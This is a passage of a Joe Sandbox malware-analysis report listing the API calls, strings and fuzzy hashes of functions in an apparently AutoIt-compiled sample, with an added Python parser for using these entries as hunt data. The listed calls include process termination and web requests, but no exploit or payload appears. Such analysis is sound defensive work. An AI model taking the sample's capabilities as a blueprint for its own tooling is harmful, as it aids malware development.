                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: 5192b0d2df41c344f5229fda0552a0c0f91ca9561153dcb34e2b6a04b5f3f7ea
                                                                                                                      • Instruction ID: 0b4fe23006a6c834ebea93d0c7d13a4ba9fd5da93c0cd00399e01194e172c769
                                                                                                                      • Opcode Fuzzy Hash: 5192b0d2df41c344f5229fda0552a0c0f91ca9561153dcb34e2b6a04b5f3f7ea
                                                                                                                      • Instruction Fuzzy Hash: 0B016CB09027597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005253F9
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0052540F
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0052541E
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0052542D
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00525437
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0052543E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: c7aeaa6cbd45fa1d6304d0d99b0d0ccda133334c7f9cd70d1a1c5a6c7a3e9bf2
                                                                                                                      • Instruction ID: a154745f8f6380e98efedee344d20358a538f7e7f07b4165232b0aaaa30d1710
                                                                                                                      • Opcode Fuzzy Hash: c7aeaa6cbd45fa1d6304d0d99b0d0ccda133334c7f9cd70d1a1c5a6c7a3e9bf2
                                                                                                                      • Instruction Fuzzy Hash: CCF06D36240158BBE7215BA6DC0DEEB7A7CEFD7B1AF000169FA04D1090A7A01A05D7B5
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00527243
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,004D0EE4,?,?), ref: 00527254
                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,004D0EE4,?,?), ref: 00527261
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,004D0EE4,?,?), ref: 0052726E
                                                                                                                        • Part of subcall function 00526C35: CloseHandle.KERNEL32(00000000,?,0052727B,?,004D0EE4,?,?), ref: 00526C3F
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00527281
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,004D0EE4,?,?), ref: 00527288
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: e33c5e8690f71a3aa70331a0e09fbbb20b975c8767779793f23b0d8c1fd44af8
                                                                                                                      • Instruction ID: 7482a8ae70d736227a79e4cd46fe6ff37de9a26f766f592f917df7a37410cdea
                                                                                                                      • Opcode Fuzzy Hash: e33c5e8690f71a3aa70331a0e09fbbb20b975c8767779793f23b0d8c1fd44af8
                                                                                                                      • Instruction Fuzzy Hash: 1AF0823E548612EBE7112B68FD4C9DB7B79FF5B706B100531F503A10A0CBB65815DB60
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0051899D
                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 005189A9
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005189B2
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005189BA
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005189C3
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 005189CA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: e229fcf51981d31fef23765413a26f9ca4da4d5cf94bd112d0506f7bfd1bbfff
                                                                                                                      • Instruction ID: 78153e66fc98864752d8cc4585ae1ed73b7573313a3f3adbd4ba9077d3c15d22
                                                                                                                      • Opcode Fuzzy Hash: e229fcf51981d31fef23765413a26f9ca4da4d5cf94bd112d0506f7bfd1bbfff
                                                                                                                      • Instruction Fuzzy Hash: D2E0ED3A004001FBD7011FE9EC0C986BFB9FFAA7267105630F215C1470CB325424EB50
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00552C7C,?), ref: 005176EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00552C7C,?), ref: 00517702
• CLSIDFromProgID.OLE32(?,?,00000000,0054FB80,000000FF,?,00000000,00000800,00000000,?,00552C7C,?), ref: 00517727
• _memcmp.LIBCMT ref: 00517748
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID: ,,U
• API String ID: 314563124-3961956419
• Opcode ID: 25291ea0fd0af49f1877fa0845319bc6b6a5488bfa3837a9013134f8a1bd0c86
• Instruction ID: fbeb51e070996f598247da288d7ba7003ed52fc659194ca29ab2066fa12e2a60
• Opcode Fuzzy Hash: 25291ea0fd0af49f1877fa0845319bc6b6a5488bfa3837a9013134f8a1bd0c86
• Instruction Fuzzy Hash: F3814075A00109EFDB04DFA8C984EEEBBB9FF89315F204558F505AB250DB71AE45CB60
APIs
• VariantInit.OLEAUT32(?), ref: 00538613
• CharUpperBuffW.USER32(?,?), ref: 00538722
• VariantClear.OLEAUT32(?), ref: 0053889A
  • Part of subcall function 00527562: VariantInit.OLEAUT32(00000000), ref: 005275A2
  • Part of subcall function 00527562: VariantCopy.OLEAUT32(00000000,?), ref: 005275AB
  • Part of subcall function 00527562: VariantClear.OLEAUT32(00000000), ref: 005275B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
• Opcode ID: 1b8301b7626ec6d43641777040e45416293462b6cffb8bcfcaeed9c45cebb86d
• Instruction ID: 86a17756ec6ae250003fcf4985d0049982a26e8ddbb50bad582bbb176a7695e5
• Opcode Fuzzy Hash: 1b8301b7626ec6d43641777040e45416293462b6cffb8bcfcaeed9c45cebb86d
• Instruction Fuzzy Hash: F19189746083019FCB04DF25C48596ABBE4FF89714F148D6EF89A8B361DB31E945CB92
APIs
  • Part of subcall function 004DFC86: _wcscpy.LIBCMT ref: 004DFCA9
• _memset.LIBCMT ref: 00522B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00522BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00522C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00522C97
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
• Opcode ID: 624cced196bd067242716bf77d458c36cf780fdaa2fe2557bf49c92882e1df8e
• Instruction ID: 6fd234390ae7c7bc1da4788cc69ef586d9415a023f7471d6a8bf7e4b982665f6
• Opcode Fuzzy Hash: 624cced196bd067242716bf77d458c36cf780fdaa2fe2557bf49c92882e1df8e
• Instruction Fuzzy Hash: 2151E039508320BAD724AE29E845A6F7FE4BF96314F040A2EF894E32D0DB74CC449B52
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memmove$_free
• String ID: 3cM$_M
• API String ID: 2620147621-23921487
• Opcode ID: 5bdfff7bf847940cced84bf111b5a0aac4fa0b42909d97c0d0b1de5e42b64524
• Instruction ID: f3152cd536141a1b3dad00ac5fad8a584b421dbb626b18f99b334649501eb0ca
• Opcode Fuzzy Hash: 5bdfff7bf847940cced84bf111b5a0aac4fa0b42909d97c0d0b1de5e42b64524
• Instruction Fuzzy Hash: 88516771A043418FDB24CF29C890A6FBBE5BF85305F48482EE98987351EB39E941CB47
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memset$_memmove
• String ID: 3cM$ERCP
• API String ID: 2532777613-544494106
• Opcode ID: 224379c04dd26268c9ecc96a9011619fa8123f5f7bdfea8f2d9d25cd295567f8
• Instruction ID: 534539363dd44380083699e08f82d8f13ba54b2025d5b09f3fcd18cd189b36ba
• Opcode Fuzzy Hash: 224379c04dd26268c9ecc96a9011619fa8123f5f7bdfea8f2d9d25cd295567f8
• Instruction Fuzzy Hash: 56519071900305DBDB24DF65C951BABBBE4BF44304F2185AFE94AC7381E774AA84CB54
APIs
• _memset.LIBCMT ref: 005227C0
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005227DC
• DeleteMenu.USER32(?,00000007,00000000), ref: 00522822
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00585890,00000000), ref: 0052286B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: 3082d9c9615ac1ab09930055b8ad2a76979047930898ec7baee48530a6893f53
• Instruction ID: a329fbf53671d3814d0d154dc9169e3ffca9d4baac9d5a6424478de7cb7c812c
• Opcode Fuzzy Hash: 3082d9c9615ac1ab09930055b8ad2a76979047930898ec7baee48530a6893f53
• Instruction Fuzzy Hash: C241AE78204352AFD720DF25E884B6ABBE8FF86314F04492DF965972D1D770E804CB52
APIs
• CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0053D7C5
  • Part of subcall function 004C784B: _memmove.LIBCMT ref: 004C7899
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: BuffCharLower_memmove
• String ID: cdecl$none$stdcall$winapi
• API String ID: 3425801089-567219261
• Opcode ID: f9e44d72046f138aced2c19b32603dbda5625de7cbd6625bdb17a706571bf364
• Instruction ID: a4eb5e56a654d479b868fdec4a02331f76e5ea75c12988730c98b34773eb0078
• Opcode Fuzzy Hash: f9e44d72046f138aced2c19b32603dbda5625de7cbd6625bdb17a706571bf364
• Instruction Fuzzy Hash: AD31CF71904219ABCF00EF65D8519EEBBB4FF54324F008A6EE829A72D1DB71A945CB90
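The function entries in this part of the report are machine output: for each function, the API calls with their call-site addresses, the strings the report joins with `$`, and an Opcode and Instruction fuzzy hash. Read one block at a time they are hard to use; parsed into records they become hunt data (the Instruction Fuzzy Hash of the AUTOIT.ERROR handler or of the DllCall calling-convention check can be looked up in other AutoIt-compiled samples, and the API sets can be filtered). The Python below is an added example written for this page, not Joe Sandbox code and not part of the report. It assumes the rendering shown here, where every entry opens with an `APIs` line and every field is a `•` bullet. The sample text is constructed from three entries that appear in this section, trimmed to the lines the parser uses; the list-box message names are the winuser.h values for the constants the report shows in the SendMessageW calls and are the only values not taken from the report.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: three entries copied from this report, trimmed to the lines the parser uses.
SAMPLE = """\
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00552C7C,?), ref: 005176EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00552C7C,?), ref: 00517702
• CLSIDFromProgID.OLE32(?,?,00000000,0054FB80,000000FF,?,00000000,00000800,00000000,?,00552C7C,?), ref: 00517727
• _memcmp.LIBCMT ref: 00517748
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID: ,,U
• API String ID: 314563124-3961956419
• Instruction Fuzzy Hash: F3814075A00109EFDB04DFA8C984EEEBBB9FF89315F204558F505AB250DB71AE45CB60
APIs
• VariantInit.OLEAUT32(?), ref: 00538613
• CharUpperBuffW.USER32(?,?), ref: 00538722
• VariantClear.OLEAUT32(?), ref: 0053889A
  • Part of subcall function 00527562: VariantInit.OLEAUT32(00000000), ref: 005275A2
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• Instruction Fuzzy Hash: F19189746083019FCB04DF25C48596ABBE4FF89714F148D6EF89A8B361DB31E945CB92
APIs
  • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00518F14
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00518F27
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00518F57
Strings
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: ComboBox$ListBox
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                          # call-site address exactly as the report prints it
    subcall_of: Optional[str] = None  # parent address when the line reads "Part of subcall function X"

@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
META_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

# winuser.h list-box messages for the SendMessageW constants the report shows
LB_MESSAGES = {0x188: "LB_GETCURSEL", 0x189: "LB_GETTEXT", 0x18A: "LB_GETTEXTLEN"}

def parse_entries(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    cur: Optional[FunctionEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                   # every function entry opens with this header
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                         # section labels such as "Strings" or "Similarity"
        if m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
        elif m := META_RE.match(line):
            key, value = m["key"], m["value"].strip()
            cur.meta.setdefault(key, value)  # "Associated:" repeats per entry; keep the first
            if key == "String ID" and value:
                cur.strings = value.split("$")  # the report joins a function's strings with '$'
    return entries

def calls_to(entries: List[FunctionEntry], api_name: str) -> List[FunctionEntry]:
    """Entries whose own body (not a subcall) calls api_name."""
    return [e for e in entries
            if any(c.name == api_name and c.subcall_of is None for c in e.apis)]

def window_messages(entry: FunctionEntry) -> List[str]:
    """Message numbers passed as the second SendMessageW argument, named where known."""
    out = []
    for c in entry.apis:
        if c.name == "SendMessageW" and len(c.args) >= 2 and c.args[1] != "?":
            msg = int(c.args[1], 16)
            out.append(LB_MESSAGES.get(msg, f"0x{msg:X}"))
    return out

def by_instruction_hash(entries: List[FunctionEntry]) -> Dict[str, FunctionEntry]:
    """Index by Instruction Fuzzy Hash for cross-sample lookup; entries without one are skipped."""
    return {e.meta["Instruction Fuzzy Hash"]: e for e in entries if "Instruction Fuzzy Hash" in e.meta}

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.meta.get("API ID"), e.strings, window_messages(e))
```

The subcall lines are kept but marked with their parent address, because `calls_to` should not credit a function with an API that is only reached through a callee; filtering on `subcall_of is None` is what makes the GetClassNameW lookup return nothing for the SendMessageW entry. Entries that the report truncates without an Instruction Fuzzy Hash simply do not enter the hash index.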
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00518F14
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00518F27
                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00518F57
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 365058703-1403004172
                                                                                                                      • Opcode ID: c1bec89aafa00ea9be2aadd6eb5d6f7e0d56457f7beed69a39a16bb5c734c5d8
                                                                                                                      • Instruction ID: 51930fc4119426a5a132812b8f577553c02d327497ae9a3537ca4a0fd57a683a
                                                                                                                      • Opcode Fuzzy Hash: c1bec89aafa00ea9be2aadd6eb5d6f7e0d56457f7beed69a39a16bb5c734c5d8
                                                                                                                      • Instruction Fuzzy Hash: C2213475A00104BBEB24ABB5DC85DFFBB69EF46364F00452EF425971E0DF38188A9A10
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0053184C
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00531872
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005318A2
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 005318E9
                                                                                                                        • Part of subcall function 00532483: GetLastError.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 00532498
                                                                                                                        • Part of subcall function 00532483: SetEvent.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 005324AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                      • Opcode ID: c0bc3d047b90be90ab3d585683236e2ae943bef9fc09ded57d28fd3dee6dc340
                                                                                                                      • Instruction ID: 6f8eb4fab6d7a825c0391b680bb394c5717ff6899f6e5192ad1819494e31949f
                                                                                                                      • Opcode Fuzzy Hash: c0bc3d047b90be90ab3d585683236e2ae943bef9fc09ded57d28fd3dee6dc340
                                                                                                                      • Instruction Fuzzy Hash: E121B0B5500608BFEB119F65DC85EBBBBEDFB89788F10412AF40593240EA249D0467B8
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004C1D73
                                                                                                                        • Part of subcall function 004C1D35: GetStockObject.GDI32(00000011), ref: 004C1D87
                                                                                                                        • Part of subcall function 004C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 004C1D91
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00546461
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00546468
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0054647D
                                                                                                                      • DestroyWindow.USER32(?), ref: 00546485
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                      • Opcode ID: 328e7bcd323d6b66403081fd01ab62f19e5abb6eb4241dad6e9688182c8d0abb
                                                                                                                      • Instruction ID: c9e782880b279edbc9b123c53778c605465df87dcaa4f4e76e24b086f3a5406f
